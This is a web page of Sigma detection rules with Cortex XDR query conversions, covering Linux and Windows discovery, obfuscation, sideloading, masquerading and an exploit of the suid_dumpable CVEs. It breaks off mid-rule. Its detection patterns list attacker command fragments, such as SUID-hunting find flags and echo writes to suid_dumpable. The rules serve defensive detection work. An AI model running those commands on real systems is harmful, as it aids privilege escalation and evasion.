Palo Alto Cortex XDR detection rules

medium Moderate Medium FP

Potential Discovery Activity Using Find - Linux

Detects usage of "find" binary in a suspicious manner to perform discovery

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (action_process_image_path contains "/find" and 
 (action_process_image_command_line in ("*-perm -4000*", "*-perm -2000*", "*-perm 0777*", "*-perm -222*", "*-perm -o w*", "*-perm -o x*", "*-perm -u=s*", "*-perm -g=s*"))))

view Sigma YAML

title: Potential Discovery Activity Using Find - Linux
id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
related:
    - id: 85de3a19-b675-4a51-bfc6-b11a5186c971
      type: similar
status: test
description: Detects usage of "find" binary in a suspicious manner to perform discovery
references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
tags:
    - attack.discovery
    - attack.t1083
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/find'
        CommandLine|contains:
            - '-perm -4000'
            - '-perm -2000'
            - '-perm 0777'
            - '-perm -222'
            - '-perm -o w'
            - '-perm -o x'
            - '-perm -u=s'
            - '-perm -g=s'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Discovery Activity Using Find - MacOS

Detects usage of "find" binary in a suspicious manner to perform discovery

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 85de3a19-b675-4a51-bfc6-b11a5186c971

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_MAC and 
 (action_process_image_path contains "/find" and 
 (action_process_image_command_line in ("*-perm -4000*", "*-perm -2000*", "*-perm 0777*", "*-perm -222*", "*-perm -o w*", "*-perm -o x*", "*-perm -u=s*", "*-perm -g=s*"))))

view Sigma YAML

title: Potential Discovery Activity Using Find - MacOS
id: 85de3a19-b675-4a51-bfc6-b11a5186c971
related:
    - id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
      type: similar
status: test
description: Detects usage of "find" binary in a suspicious manner to perform discovery
references:
    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
tags:
    - attack.discovery
    - attack.t1083
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith: '/find'
        CommandLine|contains:
            - '-perm -4000'
            - '-perm -2000'
            - '-perm 0777'
            - '-perm -222'
            - '-perm -o w'
            - '-perm -o x'
            - '-perm -u=s'
            - '-perm -g=s'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong High FP

Potential Discovery Activity Via Dnscmd.EXE

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.

status test author @gott_cyber ATT&CK tactic-only id b6457d63-d2a2-4e29-859d-4e7affc153d1

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\dnscmd.exe" and 
 (action_process_image_command_line in ("*/enumrecords*", "*/enumzones*", "*/ZonePrint*", "*/info*"))))

view Sigma YAML

title: Potential Discovery Activity Via Dnscmd.EXE
id: b6457d63-d2a2-4e29-859d-4e7affc153d1
status: test
description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd
    - https://learn.microsoft.com/en-us/azure/dns/dns-zones-records
    - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
author: '@gott_cyber'
date: 2022-07-31
modified: 2023-02-04
tags:
    - attack.discovery
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\dnscmd.exe'
    selection_cli:
        CommandLine|contains:
            - '/enumrecords'
            - '/enumzones'
            - '/ZonePrint'
            - '/info'
    condition: all of selection_*
falsepositives:
    - Legitimate administration use
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Dosfuscation Activity

Detects possible payload obfuscation via the commandline

status test author frack113, Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id a77c1610-fc73-4019-8e29-0f51efc04a51

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_command_line in ("*^^*", "*^|^*", "*,;,*", "*;;;;*", "*;; ;;*", "*(,(,*", "*%COMSPEC:~*", "* c^m^d*", "*^c^m^d*", "* c^md*", "* cm^d*", "*^cm^d*", "* s^et *", "* s^e^t *", "* se^t *")))

view Sigma YAML

title: Potential Dosfuscation Activity
id: a77c1610-fc73-4019-8e29-0f51efc04a51
status: test
description: Detects possible payload obfuscation via the commandline
references:
    - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf
    - https://github.com/danielbohannon/Invoke-DOSfuscation
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-15
modified: 2023-03-06
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '^^'
            - '^|^'
            - ',;,'
            - ';;;;'
            - ';; ;;'
            - '(,(,'
            - '%COMSPEC:~'
            - ' c^m^d'
            - '^c^m^d'
            - ' c^md'
            - ' cm^d'
            - '^cm^d'
            - ' s^et '
            - ' s^e^t '
            - ' se^t '
            # - '%%'
            # - '&&'
            # - '""'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Download/Upload Activity Using Type Command

Detects usage of the "type" command to download/upload data from WebDAV server

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_command_line contains "type " and 
 action_process_image_command_line contains " > \\") or 
 (action_process_image_command_line contains "type \\" and 
 action_process_image_command_line contains " > ")))

view Sigma YAML

title: Potential Download/Upload Activity Using Type Command
id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f
status: test
description: Detects usage of the "type" command to download/upload data from WebDAV server
references:
    - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-14
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    product: windows
    category: process_creation
detection:
    # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a "/c" command
    selection_upload:
        CommandLine|contains|all:
            - 'type '
            - ' > \\\\'
    selection_download:
        CommandLine|contains|all:
            - 'type \\\\'
            - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Dropper Script Execution Via WScript/CScript/MSHTA

Detects wscript/cscript/mshta executions of scripts located in user directories

status test author Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems), Dave Johnson ATT&CK sub-technique id cea72823-df4d-4567-950c-0b579eaf0846

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path in ("*\wscript.exe", "*\cscript.exe", "*\mshta.exe")) and 
 (action_process_image_command_line in ("*:\Perflogs\*", "*:\Temp\*", "*:\Tmp\*", "*:\Users\Public\*", "*:\Windows\Temp\*", "*\AppData\Local\Temp\*", "*\AppData\Roaming\Temp\*", "*\Start Menu\Programs\Startup\*", "*\Temporary Internet*", "*\Windows\Temp*", "*%LocalAppData%\Temp\*", "*%TEMP%*", "*%TMP%*")) and 
 (action_process_image_command_line in ("*.hta*", "*.js*", "*.jse*", "*.vba*", "*.vbe*", "*.vbs*", "*.wsf*", "*.wsh*"))))

view Sigma YAML

title: Potential Dropper Script Execution Via WScript/CScript/MSHTA
id: cea72823-df4d-4567-950c-0b579eaf0846
related:
    - id: 1e33157c-53b1-41ad-bbcc-780b80b58288
      type: similar
status: test
description: Detects wscript/cscript/mshta executions of scripts located in user directories
references:
    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
    - https://redcanary.com/blog/gootloader/
    - https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/
author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems), Dave Johnson
date: 2019-01-16
modified: 2026-02-17
tags:
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_exec:
        Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
            - '\mshta.exe'
    selection_paths:
        CommandLine|contains:
            - ':\Perflogs\'
            - ':\Temp\'
            - ':\Tmp\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\Temp\'
            - '\Start Menu\Programs\Startup\'
            - '\Temporary Internet'
            - '\Windows\Temp'
            - '%LocalAppData%\Temp\'
            - '%TEMP%'
            - '%TMP%'
    selection_ext:
        CommandLine|contains:
            - '.hta'
            - '.js'
            - '.jse'
            - '.vba'
            - '.vbe'
            - '.vbs'
            - '.wsf'
            - '.wsh'
    condition: all of selection_*
falsepositives:
    - Some installers might generate a similar behavior. An initial baseline is required
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Encrypted Registry Blob Related To SNAKE Malware

Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\SOFTWARE\Classes\.wav\OpenWithProgIds\" and 
 (not 
 (action_registry_key_name in ("*.AssocFile.WAV", "*.wav.*")))))

view Sigma YAML

title: Potential Encrypted Registry Blob Related To SNAKE Malware
id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b
status: test
description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
references:
    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-10
modified: 2023-08-17
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Classes\.wav\OpenWithProgIds\'
    filter_main_wav:
        - TargetObject|endswith: '.AssocFile.WAV'
        - TargetObject|contains: '.wav.'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Some additional tuning might be required to tune out legitimate processes that write to this key by default
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Exploitation of CVE-2025-5054 or CVE-2025-4598

Detects attempts of an attacker to enable core dumps for set-user-ID (SUID) processes by modifying the system file /proc/sys/fs/suid_dumpable, typically by setting its value to 1 or 2. Enabling this feature allows memory dumps (core dumps) of SUID processes, which usually run with elevated privileges. These dumps may contain sensitive information such as passwords, cryptographic keys or other secrets. CVE-2025-5054: Information leak via core dumps from SUID binaries using apport. CVE-2025-4598: Information disclosure in systemd-coredump due to insecure handling of SUID process memory dumps.

status experimental author Milad Cheraghi ATT&CK technique id 33b3cfb1-574e-44b9-b527-fbf9303b9d7b

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (((action_process_image_path in ("*/sbin/sysctl", "*/bin/sysctl")) and 
 action_process_image_command_line contains "fs.suid_dumpable=") or 
 ((action_process_image_path in ("*/bin/bash", "*/bin/sh")) and 
 (action_process_image_command_line in ("*echo 1 > /proc/sys/fs/suid_dumpable*", "*echo 2 > /proc/sys/fs/suid_dumpable*", "*echo 1 >/proc/sys/fs/suid_dumpable*", "*echo 2 >/proc/sys/fs/suid_dumpable*", "*echo 1> /proc/sys/fs/suid_dumpable*", "*echo 2> /proc/sys/fs/suid_dumpable*", "*echo 1>/proc/sys/fs/suid_dumpable*", "*echo 2>/proc/sys/fs/suid_dumpable*")))))

view Sigma YAML

title: Potential Exploitation of CVE-2025-5054 or CVE-2025-4598
id: 33b3cfb1-574e-44b9-b527-fbf9303b9d7b
status: experimental
description: |
    Detects attempts of an attacker to enable core dumps for set-user-ID (SUID) processes by modifying the system file /proc/sys/fs/suid_dumpable, typically by setting its value to 1 or 2.
    Enabling this feature allows memory dumps (core dumps) of SUID processes, which usually run with elevated privileges.
    These dumps may contain sensitive information such as passwords, cryptographic keys or other secrets.
    CVE-2025-5054: Information leak via core dumps from SUID binaries using apport.
    CVE-2025-4598: Information disclosure in systemd-coredump due to insecure handling of SUID process memory dumps.
references:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5054
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4598
    - https://blog.qualys.com/vulnerabilities-threat-research/2025/05/29/qualys-tru-discovers-two-local-information-disclosure-vulnerabilities-in-apport-and-systemd-coredump-cve-2025-5054-and-cve-2025-4598
author: Milad Cheraghi
date: 2026-04-28
tags:
    - attack.privilege-escalation
    - attack.credential-access
    - attack.t1548
    - attack.t1003
    - cve.2025-5054
    - cve.2025-4598
    - detection.emerging-threats
logsource:
    product: linux
    category: process_creation
detection:
    selection_suid_dumpable_sysctl:
        Image|endswith:
            - '/sbin/sysctl'
            - '/bin/sysctl'
        CommandLine|contains: 'fs.suid_dumpable='
    selection_echo_proc_write:
        Image|endswith:
            - '/bin/bash'
            - '/bin/sh'
        CommandLine|contains:
            - 'echo 1 > /proc/sys/fs/suid_dumpable'
            - 'echo 2 > /proc/sys/fs/suid_dumpable'
            - 'echo 1 >/proc/sys/fs/suid_dumpable'
            - 'echo 2 >/proc/sys/fs/suid_dumpable'
            - 'echo 1> /proc/sys/fs/suid_dumpable'
            - 'echo 2> /proc/sys/fs/suid_dumpable'
            - 'echo 1>/proc/sys/fs/suid_dumpable'
            - 'echo 2>/proc/sys/fs/suid_dumpable'
    condition: 1 of selection_*
falsepositives:
    - System administrators enabling debugging temporarily
    - Legitimate crash diagnostic operations
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Fake Instance Of Hxtsr.EXE Executed

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe

status test author Sreeman ATT&CK technique id 4e762605-34a8-406d-b72e-c1a089313320

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\hxtsr.exe" and 
 (not 
 (action_process_image_path contains ":\program files\windowsapps\microsoft.windowscommunicationsapps_" and 
 action_process_image_path contains "\hxtsr.exe"))))

view Sigma YAML

title: Potential Fake Instance Of Hxtsr.EXE Executed
id: 4e762605-34a8-406d-b72e-c1a089313320
status: test
description: |
    HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
    HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
    Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
references:
    - Internal Research
author: Sreeman
date: 2020-04-17
modified: 2024-02-08
tags:
    - attack.stealth
    - attack.t1036
logsource:
    product: windows
    category: process_creation
detection:
    # TODO: Link this to the more generic system process rule
    selection:
        Image|endswith: '\hxtsr.exe'
    filter_main_hxtsr:
        Image|contains: ':\program files\windowsapps\microsoft.windowscommunicationsapps_'
        Image|endswith: '\hxtsr.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential File Download Via MS-AppInstaller Protocol Handler

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"

status test author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel ATT&CK technique id 180c7c5c-d64b-4a63-86e9-68910451bc8b

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (contains and 
 action_process_image_command_line contains "http"))

view Sigma YAML

title: Potential File Download Via MS-AppInstaller Protocol Handler
id: 180c7c5c-d64b-4a63-86e9-68910451bc8b
related:
    - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a
      type: derived
status: test
description: |
    Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
    The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
references:
    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
date: 2023-11-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'ms-appinstaller://?source='
            - 'http'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Goopdate.DLL Sideloading

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

status test author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id b6188d2f-b3c4-4d2c-a17d-9706e0851af0

cortex_xdr query

config case_sensitive = false | preset=xdr_image_load | filter event_type = ENUM.LOAD_IMAGE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_module_path contains "\goopdate.dll" and 
 (not 
 (action_module_path in ("C:\Program Files (x86)\*", "C:\Program Files\*"))) and 
 (not 
 (((actor_process_image_path contains "\AppData\Local\Temp\GUM" and 
 actor_process_image_path contains ".tmp\Dropbox") and 
 (action_module_path contains "\AppData\Local\Temp\GUM" and 
 action_module_path contains ".tmp\goopdate.dll")) or 
 ((actor_process_image_path in ("*\AppData\Local\Temp\GUM*", "*:\Windows\SystemTemp\GUM*")) and 
 actor_process_image_path contains ".tmp\GoogleUpdate.exe" and 
 (action_module_path in ("*\AppData\Local\Temp\GUM*", "*:\Windows\SystemTemp\GUM*")))))))

view Sigma YAML

title: Potential Goopdate.DLL Sideloading
id: b6188d2f-b3c4-4d2c-a17d-9706e0851af0
status: test
description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
modified: 2025-10-07
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\goopdate.dll'
    filter_main_generic:
        ImageLoaded|startswith:
            # Many third party chromium based apps use this DLLs. It's better to create a baseline and add specific filters
            - 'C:\Program Files (x86)\'
            - 'C:\Program Files\'
    filter_optional_dropbox_installer_temp:
        Image|contains|all:
            - '\AppData\Local\Temp\GUM'
            - '.tmp\Dropbox'
        ImageLoaded|contains|all:
            - '\AppData\Local\Temp\GUM'
            - '.tmp\goopdate.dll'
    filter_optional_googleupdate_temp:
        Image|contains:
            - '\AppData\Local\Temp\GUM'
            - ':\Windows\SystemTemp\GUM'
        Image|endswith: '.tmp\GoogleUpdate.exe'
        ImageLoaded|contains:
            - '\AppData\Local\Temp\GUM'
            - ':\Windows\SystemTemp\GUM'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.
    - Other third party chromium browsers located in AppData
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"

status test author Scoubi (@ScoubiMtl) ATT&CK sub-technique id a8f866e1-bdd4-425e-a27a-37619238d9c7

cortex_xdr query

config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_file_name contains "::$index_allocation")

view Sigma YAML

title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
id: a8f866e1-bdd4-425e-a27a-37619238d9c7
related:
    - id: 0900463c-b33b-49a8-be1d-552a3b553dae
      type: similar
status: test
description: |
    Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
references:
    - https://twitter.com/pfiatde/status/1681977680688738305
    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/
    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/
    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation
    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
author: Scoubi (@ScoubiMtl)
date: 2023-10-09
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    product: windows
    category: file_event
detection:
    selection:
        # Note: Both Sysmon and ETW are unable to log the presence of such streams in the CommandLine. But EDRs such as Crowdstrike are able to use e.g. CMD console history. Users are advised to test this before usage
        TargetFilename|contains: '::$index_allocation'
    condition: selection
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

status test author Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl) ATT&CK sub-technique id 0900463c-b33b-49a8-be1d-552a3b553dae

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_process_image_command_line contains "::$index_allocation")

view Sigma YAML

title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
id: 0900463c-b33b-49a8-be1d-552a3b553dae
related:
    - id: a8f866e1-bdd4-425e-a27a-37619238d9c7
      type: similar
status: test
description: |
    Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
references:
    - https://twitter.com/pfiatde/status/1681977680688738305
    - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/
    - https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/
    - https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation
    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
date: 2023-10-09
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage
        CommandLine|contains: '::$index_allocation'
    condition: selection
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Homoglyph Attack Using Lookalike Characters

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

status test author Micah Babinski, @micahbabinski ATT&CK sub-technique id 32e280f1-8ad4-46ef-9e80-910657611fbc

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_command_line in ("*А*", "*В*", "*Е*", "*К*", "*М*", "*Н*", "*О*", "*Р*", "*С*", "*Т*", "*Х*", "*Ѕ*", "*І*", "*Ј*", "*Ү*", "*Ӏ*", "*Ԍ*", "*Ԛ*", "*Ԝ*", "*Α*", "*Β*", "*Ε*", "*Ζ*", "*Η*", "*Ι*", "*Κ*", "*Μ*", "*Ν*", "*Ο*", "*Ρ*", "*Τ*", "*Υ*", "*Χ*")) or 
 (action_process_image_command_line in ("*а*", "*е*", "*о*", "*р*", "*с*", "*х*", "*ѕ*", "*і*", "*ӏ*", "*ј*", "*һ*", "*ԁ*", "*ԛ*", "*ԝ*", "*ο*"))))

view Sigma YAML

title: Potential Homoglyph Attack Using Lookalike Characters
id: 32e280f1-8ad4-46ef-9e80-910657611fbc
status: test
description: |
    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
    This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
references:
    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish
    - http://www.irongeek.com/homoglyph-attack-generator.php
author: Micah Babinski, @micahbabinski
date: 2023-05-07
tags:
    - attack.stealth
    - attack.t1036
    - attack.t1036.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_upper:
        CommandLine|contains:
            - "\u0410" # А/A
            - "\u0412" # В/B
            - "\u0415" # Е/E
            - "\u041a" # К/K
            - "\u041c" # М/M
            - "\u041d" # Н/H
            - "\u041e" # О/O
            - "\u0420" # Р/P
            - "\u0421" # С/C
            - "\u0422" # Т/T
            - "\u0425" # Х/X
            - "\u0405" # Ѕ/S
            - "\u0406" # І/I
            - "\u0408" # Ј/J
            - "\u04ae" # Ү/Y
            - "\u04c0" # Ӏ/I
            - "\u050C" # Ԍ/G
            - "\u051a" # Ԛ/Q
            - "\u051c" # Ԝ/W
            - "\u0391" # Α/A
            - "\u0392" # Β/B
            - "\u0395" # Ε/E
            - "\u0396" # Ζ/Z
            - "\u0397" # Η/H
            - "\u0399" # Ι/I
            - "\u039a" # Κ/K
            - "\u039c" # Μ/M
            - "\u039d" # Ν/N
            - "\u039f" # Ο/O
            - "\u03a1" # Ρ/P
            - "\u03a4" # Τ/T
            - "\u03a5" # Υ/Y
            - "\u03a7" # Χ/X
    selection_lower:
        CommandLine|contains:
            - "\u0430" # а/a
            - "\u0435" # е/e
            - "\u043e" # о/o
            - "\u0440" # р/p
            - "\u0441" # с/c
            - "\u0445" # х/x
            - "\u0455" # ѕ/s
            - "\u0456" # і/i
            - "\u04cf" # ӏ/l
            - "\u0458" # ј/j
            - "\u04bb" # һ/h
            - "\u0501" # ԁ/d
            - "\u051b" # ԛ/q
            - "\u051d" # ԝ/w
            - "\u03bf" # ο/o
    condition: 1 of selection_*
falsepositives:
    - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Homoglyph Attack Using Lookalike Characters in Filename

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

status test author Micah Babinski, @micahbabinski ATT&CK sub-technique id 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6

cortex_xdr query

config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
